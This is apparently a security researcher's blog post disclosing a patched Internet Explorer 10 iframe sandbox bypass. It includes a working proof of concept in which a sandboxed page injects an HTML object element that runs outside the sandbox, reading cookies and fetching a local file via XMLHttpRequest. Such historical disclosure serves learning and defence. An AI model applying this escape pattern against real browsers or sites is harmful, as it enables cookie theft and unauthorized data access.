IE10 Sandbox Multiple Flags Bypass via HTML Object Tag

Even with only allow-scripts enabled and all other sandbox flags absent, a sandboxed iframe could break out of all restrictions by injecting an HTML <object> element with type="text/html" after the page had loaded. The content rendered inside the object tag behaved as if it were completely outside the sandbox.

<!-- parent page (IE8 docMode to render object as object, not iframe) -->
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" />
<iframe sandbox="allow-scripts" src="sandboxed.html"></iframe>
<script>
document.cookie = "COOKIE WAS SET BY THE TOP WINDOW";
</script>

<!-- sandboxed.html -->
<script>
document.body.innerHTML = '<object data="sandboxbreaker.html" type="text/html"></object>';
</script>

<!-- sandboxbreaker.html: runs outside the sandbox -->
<script>
var strFileToRead = (location.href.substring(0, location.href.lastIndexOf('/') + 1)) + 'index.html';
var str = '<b>Cookie</b> value: <font color="blue">' + document.cookie + '</font><br /><br />';
document.write(str);

var oXML = new XMLHttpRequest();
oXML.open("GET", strFileToRead, false);
oXML.send(null);
document.getElementById("ta").value = oXML.responseText;
</script>

IE9 and IE10 would render the <object type="text/html"> as an iframe, which inherited the sandbox. But in IE8 document mode, it was rendered as a genuine object element that the sandbox did not cover. The object could read cookies, make XMLHttpRequest calls, and perform anything else the sandbox was supposed to prevent.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [IE10 Sandbox allow-same-origin Bypass via XML Island] :: [IE10 Sandbox Bypass via navigate.call(parent) with JavaScript Protocol] >